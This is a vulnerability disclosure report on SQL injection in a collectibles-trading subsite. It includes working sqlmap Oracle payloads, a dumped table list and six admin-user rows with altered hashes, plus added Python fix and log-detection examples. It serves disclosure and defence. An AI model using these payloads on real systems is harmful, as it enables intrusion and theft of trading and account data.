2015-11-10: Details reported to the vendor; awaiting vendor response
2015-11-20: Vendor confirmed; details disclosed to the vendor only
2015-11-30: Details disclosed to core white hats and relevant domain experts
2015-12-10: Details disclosed to regular white hats
2015-12-20: Details disclosed to intern white hats
2016-01-11: Details disclosed to the public
A subsite of 中国艺交所邮币卡交易信中心 (a stamp, coin and card trading centre) has a SQL injection vulnerability through which trade records and other data can be read.
Injection point: http://**.**.**.**:16929/SelfOpenAccount/firmController.fir?funcflg=getBrokerList&areaId=45 (the database contains more than 300 tables).
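As an added illustration (not code from the report or from the vendor's application), the following Python reproduces the shape of the bug behind firmController.fir?funcflg=getBrokerList&areaId=45 on an in-memory SQLite database that stands in for the Oracle schema TRADE_GNNT, and shows the type-checked, parameterised version that closes it. BR_BROKER is a table name from the report's listing, but its columns (BROKERID, NAME, AREAID) and the C_USER columns used here are assumptions, and all rows are constructed sample data.

```python
import sqlite3

# Added example, not code from the original report or the vendor's application.
# SQLite stands in for Oracle; BR_BROKER's columns and the C_USER columns are assumed.


def build_db() -> sqlite3.Connection:
    """Constructed sample data: two brokers in area 45, one in area 46, one admin user."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE BR_BROKER (BROKERID INTEGER, NAME TEXT, AREAID INTEGER);
        INSERT INTO BR_BROKER VALUES (1, 'broker-a', 45), (2, 'broker-b', 45), (3, 'broker-c', 46);
        CREATE TABLE C_USER (ID TEXT, PASSWORD TEXT);
        INSERT INTO C_USER VALUES ('admin', 'md5-placeholder');
        """
    )
    return conn


def get_broker_list_vulnerable(conn: sqlite3.Connection, area_id: str) -> list:
    """The bug class sqlmap found: the request parameter is concatenated into the SQL text."""
    sql = f"SELECT BROKERID, NAME, AREAID FROM BR_BROKER WHERE AREAID = {area_id}"
    return conn.execute(sql).fetchall()


def get_broker_list_safe(conn: sqlite3.Connection, area_id: str) -> list:
    """Hardened version: validate the type first, then bind the value as a parameter."""
    if not area_id.isdigit():
        raise ValueError(f"areaId must be an integer, got {area_id!r}")
    sql = "SELECT BROKERID, NAME, AREAID FROM BR_BROKER WHERE AREAID = ?"
    return conn.execute(sql, (int(area_id),)).fetchall()


def demo() -> dict:
    """Run the techniques from the sqlmap output against both versions."""
    conn = build_db()
    out = {}
    # Boolean-based blind: a true tautology leaves the result set intact,
    # a false one empties it, so one bit of data can be inferred per request.
    out["true_rows"] = len(get_broker_list_vulnerable(conn, "45 AND 7878=7878"))
    out["false_rows"] = len(get_broker_list_vulnerable(conn, "45 AND 7878=7879"))
    # UNION: match the column count (3 here, 14 on the real endpoint) and pull
    # rows from another table; the injected rows have NULL in the real columns.
    union = "45 UNION ALL SELECT NULL, ID || ':' || PASSWORD, NULL FROM C_USER"
    out["union_rows"] = [r[1] for r in get_broker_list_vulnerable(conn, union) if r[0] is None]
    # Hardened version: the same payloads are rejected before any SQL is built.
    out["safe_rejected"] = []
    for payload in ("45 AND 7878=7878", union):
        try:
            get_broker_list_safe(conn, payload)
            out["safe_rejected"].append(False)
        except ValueError:
            out["safe_rejected"].append(True)
    out["safe_rows"] = len(get_broker_list_safe(conn, "45"))
    return out


if __name__ == "__main__":
    print(demo())
```

On the real endpoint sqlmap needed 14 NULLs because the vulnerable SELECT returns 14 columns; it wraps its probe in the marker strings visible in the payloads (CHR(113)||CHR(98)||CHR(112)||CHR(113)||CHR(113), i.e. "qbpqq", and "qpxjq") so it can find the reflected column in the response. The fix has two independent parts: rejecting anything that is not an integer before it reaches the database, and binding the value as a parameter so the driver never interprets it as SQL. Either alone would stop this injection; together they also turn malformed input into an application-level error instead of an Oracle error message that can be abused for error-based extraction.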
Parameter: areaId (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: funcflg=getBrokerList&areaId=45 AND 7878=7878

    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)
    Payload: funcflg=getBrokerList&areaId=45 AND 1086=CTXSYS.DRITHSX.SN(1086,(CHR(113)||CHR(98)||CHR(112)||CHR(113)||CHR(113)||(SELECT (CASE WHEN (1086=1086) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(112)||CHR(120)||CHR(106)||CHR(113)))

    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind (heavy query)
    Payload: funcflg=getBrokerList&areaId=45 AND 1951=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)

    Type: UNION query
    Title: Generic UNION query (NULL) - 14 columns
    Payload: funcflg=getBrokerList&areaId=45 UNION ALL SELECT NULL,NULL,CHR(113)||CHR(98)||CHR(112)||CHR(113)||CHR(113)||CHR(81)||CHR(98)||CHR(106)||CHR(83)||CHR(99)||CHR(109)||CHR(116)||CHR(90)||CHR(67)||CHR(81)||CHR(113)||CHR(112)||CHR(120)||CHR(106)||CHR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM DUAL-- -
---
back-end DBMS: Oracle
current schema (equivalent to database on Oracle): 'TRADE_GNNT'

Database: TRADE_GNNT
[314 tables]
A_TEM_I_ORDERFEE
BI_DISMANTLE
BI_FINANCINGSTOCK
BI_FIRM
BI_FROZENSTOCK
BI_GOODSPROPERTY
BI_OUTSTOCK
BI_PLEDGESTOCK
BI_STOCK
BI_STOCKCHGLOG
BI_STOCKOPERATION
BI_SYSTEMPROPS
BI_TRADESTOCK
BI_WAREHOUSE
BR_BROKER
BR_BROKERAGE
BR_BROKERAGEANDFIRM
BR_BROKERAREA
BR_BROKERMENU
BR_BROKERREWARD
BR_BROKERREWARDPROPS
BR_BROKERRIGHT
BR_BROKERTYPE
BR_FIRMANDBROKER
BR_FIRMAPPLY
BR_REWARDPARAMETERPROPS
BR_TRADEMODULE
C_APPLY
C_AUDIT
C_DEPLOY_CONFIG
C_FRONT_MYMENU
C_FRONT_RIGHT
C_FRONT_ROLE
C_FRONT_ROLE_RIGHT
C_FRONT_SHORTCUTMENU
C_FRONT_USER_RIGHT
C_FRONT_USER_ROLE
C_GLOBALLOG_ALL
C_GLOBALLOG_ALL_H
C_LOGCATALOG
C_MARKETINFO
C_MYMENU
C_RIGHT
C_ROLE
C_ROLE_RIGHT
C_SUBMODULE
C_TRADEMODULE
C_USER
C_USER_RIGHT
C_USER_ROLE
F_ACCOUNT
F_ACCOUNTBOOK
F_BANKCLEARLEDGERCONFIG
F_B_ABCINFO
F_B_ACCOUNT
F_B_BANKACCOUNT
F_B_BANKCAPITALRESULT
F_B_BANKCOMPAREINFO
F_B_BANKQSDATE
F_B_BANKS
F_B_BANKTRANSFER
F_B_BATCUSTFILE
F_B_CAPITALINFO
F_B_DICTIONARY
F_B_FCS_10
F_B_FCS_11
F_B_FCS_13
F_B_FCS_99
F_B_FEEINFO
F_B_FFHD
F_B_FIRMBALANCE
F_B_FIRMBALANCEERROR
F_B_FIRMIDANDACCOUNT
F_B_FIRMKXH
F_B_FIRMTRADESTATUS
F_B_FIRMUSER
F_B_HXQS
F_B_INTERFACELOG
F_B_LOG
F_B_MAKETMONEY
F_B_MARGINS
F_B_MARKETACOUNT
F_B_PROPERBALANCE
F_B_QSRESULT
F_B_QUANYI
F_B_QUEUEINFO
F_B_RGSTCAPITALVALUE
F_B_TRADEDATA
F_B_TRADEDETAILACC
F_B_TRADELIST
F_B_TRANSFER
F_B_TRANSMONEYOBJ
F_B_ZFPH
F_CLEARSTATUS
F_CLIENTLEDGER
F_DAILYBALANCE
F_FIRMBALANCE
F_FIRMCLEARFUNDS
F_FIRMFUNDS
F_FIRMFUNDS_150619
F_FIRMRIGHTSCOMPUTEFUNDS
F_FROZENFUNDFLOW
F_FROZENFUNDS
F_FUNDFLOW
F_FUNDFLOW_150619
F_H_FROZENFUNDFLOW
F_H_FUNDFLOW
F_LEDGERFIELD
F_LOG
F_SUMMARY
F_SYSTEMSTATUS
F_VOUCHER
F_VOUCHERENTRY
F_VOUCHERMODEL
K_A_BREED
K_A_BREEDTRADEPROP
K_A_CMDTYSORT
K_A_COMMODITYSETTLEPROP
K_A_COMMODITYTRADEPROP
K_A_DAYSECTION
K_A_DELAYTRADETIME
K_A_FIRMBILLCOST
K_A_FIRMBREEDFEE
K_A_FIRMBREEDMARGIN
K_A_FIRMBREEDMAXHOLDQTY
K_A_FIRMFEE
K_A_FIRMMARGIN
K_A_FIRMMAXHOLDQTY
K_A_HOTCOMMODITY
K_A_ISSUECMINFO
K_A_ISSUECMINFOSORT
K_A_MARKET
K_A_NOTTRADEDAY
K_A_SETTLEPRIVILEGE
K_A_TRADEPRIVILEGE
K_A_TRADETIME
K_A_VERSIONINFO
K_BALANCESTATUS
K_BANKBACKRATE
K_BLOCKRELATION
K_BLOCKTRADE
K_BROADCAST
K_BR_FIRMREWARDDEAIL
K_CLEARSTATUS
K_COMMODITY
K_COMMODITY_DESCRIBE
K_CONSIGNER
K_CURMINNO
K_CUSTOMER
K_CUSTOMERHOLDSUM
K_DBLOG
K_DELAYORDERS
K_DELAYQUOTATION
K_DELAYSTATUS
K_DELAYTRADE
K_E_APPLYAHEADSETTLE
K_E_APPLYBILL
K_E_APPLYBILLLOG
K_E_APPLYGAGE
K_E_DEDUCTDETAIL
K_E_DEDUCTKEEP
K_E_DEDUCTPOSITION
K_E_DIRECTFIRMBREED
K_E_EMBEDORDERS
K_E_GAGEBILL
K_E_PLEDGE
K_E_SETTING
K_E_SETTLELOG
K_FIRM
K_FIRMFEE
K_FIRMHOLDSUM
K_FIRMPICTURE
K_FIRMTRANSFER
K_FIRM_150619
K_FREEZEDETAILS
K_FREEZESUM
K_HOLDPOSITION
K_HOLDTRANSFER
K_HOLDTRANSFERFREEZEN
K_H_A_FIRMBILLCOST
K_H_BROADCAST
K_H_COMMODITY
K_H_CUSTOMERHOLDSUM
K_H_DELAYORDERS
K_H_DELAYQUOTATION
K_H_DELAYTRADE
K_H_DIRECTFIRMBREED
K_H_FIRM
K_H_FIRMFEE
K_H_FIRMHOLDSUM
K_H_FIRMMARGIN
K_H_HOLDPOSITION
K_H_I_ISSUEFEESUM
K_H_I_ORDERS
K_H_I_TRADE
K_H_LUCKYNUMBER
K_H_MARKET
K_H_ORDERS
K_H_ORIENTATIONASSIGNUPLOAD
K_H_QUOTATION
K_H_SELLFUNDS
K_H_TRADE
K_H_T_TRUSTEESHIPAPPLY
K_H_T_TRUSTFEE
K_INDEX
K_INDEXCOMMODITY
K_I_ALLOTMENTCONFIG
K_I_FIRMALLOTMENT
K_I_ISSUEFEESUM
K_I_ORDERS
K_I_ORDERS_150619
K_I_TRADE
K_LUCKYNUMBER
K_MARKETFIRM
K_MARKETFIRMFUNDS
K_MARKETFIRMFUNDSSUM
K_NOTSENDBROADCAST
K_ORDERS
K_ORDERS_1
K_ORIENTATIONASSIGNUPLOAD
K_QUOTATION
K_REDUCESET
K_REISSUEASSIGN
K_REISSUECOMMODITY
K_REISSUEFAILBACKPAYOUT
K_REISSUEREDUCE
K_REISSUEUNDERWRITER
K_REISSUEVENDORBACKBROKER
K_REISSUEVENDORPAYOUT
K_SELLFUNDS
K_SETTLECOMMODITY
K_SETTLEFIRMHOLDSUM
K_SETTLEHOLDPOSITION
K_SETTLEMATCH
K_SETTLEPROPS
K_SETTLEUNDERWRITERSUBSCRIBE
K_SHARESAUTOFREE
K_SHARESNOTE
K_SPECFROZENHOLD
K_SPLITSET
K_SYSLOG
K_SYSLOG_150619
K_SYSTEMSTATUS
K_TRADE
K_TRADER
K_TRANSFERORDER
K_T_COMMODITYADVICE
K_T_TRUSTDATE
K_T_TRUSTEESHIPAPPLY
K_T_TRUSTFEE
K_T_TRUSTLOGS
K_T_TRUSTTURNHISTABLE
K_T_TRUSTWAREHOUSE
K_UNDERWRITERSUBSCRIBE
K_VALIDBILL
K_VALIDGAGEBILL
K_VENDORBACKBROKER
K_VENDORPAYOUT
L_AUCONFIG
L_DICTIONARY
L_MODULEANDAU
M_AGENTTRADER
M_BREED
M_BREEDPROPS
M_CATEGORY
M_CERTIFICATETYPE
M_ERRORLOGINLOG
M_FIRM
M_FIRMCATEGORY
M_FIRMMODULE
M_FIRM_1
M_FIRM_APPLY
M_INDUSTRY
M_MESSAGE
M_NOTICE
M_PROCEDURES_ERRORCODE
M_PROPERTY
M_PROPERTYTYPE
M_SYSTEMPROPS
M_TRADER
M_TRADERMODULE
M_TRADER_1
M_ZONE
TZ_TEST
W_ERRORLOGINLOG
W_GLOBALLOG_ALL
W_GLOBALLOG_ALL_H
W_K_BILL
W_K_BILLFROZENHOLDPOSITION
W_K_BILLLABELLED
W_K_BILLLOG
W_K_COMMODITYANDSTOCK
W_K_COMMODITYAVGPRICE
W_K_DELIVERYONLINE
W_K_DELIVERYPASSWORDLOG
W_K_INWAREHOUSE
W_K_INWAREHOUSEANDSTOCK
W_K_MARKETOPERATE
W_K_MENU
W_K_OUTWAREHOUSE
W_K_USERS
W_K_WAREHOUSE
W_K_WAREHOUSEANDBREED
W_K_WAREHOUSELABELLED
W_K_WAREHOUSESUM
W_LOGCATALOG
W_MYMENU
W_RIGHT
W_ROLE
W_ROLE_RIGHT
W_TRADEMODULE
W_USER
W_USER_RIGHT
W_USER_ROLE
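For the defender's side, here is an added example (not part of the original report) that flags the four techniques sqlmap reported for the areaId parameter when they show up in web-server access logs. The log lines are constructed for this example in combined-log format with made-up client addresses; the field layout of the real server's logs is an assumption and the request-line regex should be adjusted to match it.

```python
import re
from urllib.parse import parse_qsl, unquote_plus, urlparse

# Added example, not part of the original report. Log lines are constructed;
# the combined-log layout and the client IPs are assumptions.

# One signature per technique sqlmap reported for the areaId parameter.
SIGNATURES = {
    "boolean-based blind": re.compile(r"\bAND\s+\d+\s*=\s*\d+\b", re.I),
    "error-based (Oracle)": re.compile(r"\bCTXSYS\.DRITHSX\.SN\s*\(", re.I),
    "time-based heavy query": re.compile(r"\bALL_USERS\s+T\d+\s*,\s*ALL_USERS\s+T\d+", re.I),
    "UNION query": re.compile(r"\bUNION\s+(?:ALL\s+)?SELECT\b", re.I),
}

# "GET /path?query HTTP/1.1" as it appears in a combined-format access log line.
REQUEST_RE = re.compile(r'"(?:GET|POST)\s+(\S+)\s+HTTP/[\d.]+"')

# Constructed sample log: one legitimate request, then one request per technique.
LOG_LINES = """\
10.0.0.5 - - [10/Nov/2015:10:12:01 +0800] "GET /SelfOpenAccount/firmController.fir?funcflg=getBrokerList&areaId=45 HTTP/1.1" 200 2311
10.0.0.9 - - [10/Nov/2015:10:12:02 +0800] "GET /SelfOpenAccount/firmController.fir?funcflg=getBrokerList&areaId=45%20AND%207878%3D7878 HTTP/1.1" 200 2311
10.0.0.9 - - [10/Nov/2015:10:12:03 +0800] "GET /SelfOpenAccount/firmController.fir?funcflg=getBrokerList&areaId=45%20AND%201086%3DCTXSYS.DRITHSX.SN(1086,(CHR(113)%7C%7CCHR(98))) HTTP/1.1" 500 512
10.0.0.9 - - [10/Nov/2015:10:12:09 +0800] "GET /SelfOpenAccount/firmController.fir?funcflg=getBrokerList&areaId=45+AND+1951%3D(SELECT+COUNT(*)+FROM+ALL_USERS+T1,ALL_USERS+T2,ALL_USERS+T3,ALL_USERS+T4,ALL_USERS+T5) HTTP/1.1" 200 2311
10.0.0.9 - - [10/Nov/2015:10:12:10 +0800] "GET /SelfOpenAccount/firmController.fir?funcflg=getBrokerList&areaId=45+UNION+ALL+SELECT+NULL,NULL,CHR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL+FROM+DUAL--+- HTTP/1.1" 200 2480
"""


def fully_decode(value: str, rounds: int = 3) -> str:
    """Undo repeated percent/plus encoding so the signatures see plain SQL text."""
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def classify_request(url: str) -> set:
    """Return the techniques whose signature matches any query parameter of a request URL."""
    hits = set()
    for _, value in parse_qsl(urlparse(url).query, keep_blank_values=True):
        decoded = fully_decode(value)  # parse_qsl decodes once; this catches double encoding
        for name, pattern in SIGNATURES.items():
            if pattern.search(decoded):
                hits.add(name)
    return hits


def scan(log_text: str) -> list:
    """Return (client_ip, [techniques]) for every log line carrying an injection signature."""
    findings = []
    for line in log_text.splitlines():
        match = REQUEST_RE.search(line)
        if not match:
            continue
        hits = classify_request(match.group(1))
        if hits:
            findings.append((line.split()[0], sorted(hits)))
    return findings


if __name__ == "__main__":
    for ip, techniques in scan(LOG_LINES):
        print(ip, ", ".join(techniques))
```

Decoding before matching matters: sqlmap sends the payload percent-encoded, so a raw `grep UNION` over the log misses `UNION` written as `UNION+ALL` or `%55NION`. The heavy-query signature is worth keeping even though the request returns 200: it is the one technique that leaves a timing rather than a content artefact, so the access log is often the only place it is recorded.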
Trade table:
Table: K_TRADE
[21 columns]
+------------------+----------+
| Column           | Type     |
+------------------+----------+
| A_ORDERNO        | NUMBER   |
| A_TRADENO        | NUMBER   |
| A_TRADENO_CLOSED | NUMBER   |
| ATCLEARDATE      | DATE     |
| BS_FLAG          | NUMBER   |
| CLOSE_PL         | NUMBER   |
| CLOSEADDEDTAX    | NUMBER   |
| COMMODITYID      | VARCHAR2 |
| CUSTOMERID       | VARCHAR2 |
| FIRMID           | VARCHAR2 |
| HOLDPRICE        | NUMBER   |
| HOLDTIME         | DATE     |
| M_TRADENO        | NUMBER   |
| M_TRADENO_OPP    | NUMBER   |
| ORDERTYPE        | NUMBER   |
| PRICE            | NUMBER   |
| QUANTITY         | NUMBER   |
| TRADEATCLEARDATE | DATE     |
| TRADEFEE         | NUMBER   |
| TRADETIME        | DATE     |
| TRADETYPE        | NUMBER   |
+------------------+----------+
Company user information table (6 of the 62 entries shown):
Database: TRADE_GNNT
Table: C_USER
[62 entries]
+-------+----------+------------+---------+---------------------+-----------------+----------------------------------+-------------+
| ID    | ISFORBID | NAME       | SKIN    | TYPE                | KEYCODE         | PASSWORD                         | DESCRIPTION |
+-------+----------+------------+---------+---------------------+-----------------+----------------------------------+-------------+
| admin | N        | admin      | default | DEFAULT_SUPER_ADMIN | 0123456789ABCDE | 011f8fc7dd7db9d6d4a42888d5c4874c | 超级管理员  |
| 2014  | N        | 何海燕     | default | ADMIN               | 0123456789ABCDE | 3962efc16ce9cb118836a8889b93fd01 | NULL        |
| 2027  | Y        | 客服临时17 | default | ADMIN               | 0123456789ABCDE | 161606fd049c6b2c6dcc3888af629507 | NULL        |
| 2028  | Y        | 客服临时18 | default | ADMIN               | 0123456789ABCDE | 07350745e604aff8971888870421e1c2 | NULL        |
| 2029  | Y        | 客服临时19 | default | ADMIN               | 0123456789ABCDE | a50aa17bae62f7c84dec888e6b870ab1 | NULL        |
| 2030  | Y        | 客服临时20 | default | ADMIN               | 0123456789ABCDE | 1bd084e9306c8d1dda3888de9be18c44 | NULL        |
+-------+----------+------------+---------+---------------------+-----------------+----------------------------------+-------------+
The data above is shown only to prove that the vulnerability exists, so the MD5 hashes posted here have been altered.
Severity: High
Vulnerability Rank: 11
Confirmed: 2015-11-20 15:01
CNVD confirmed and reproduced the reported issue and has notified the website's operating organisation through the contact details published on the site.
None yet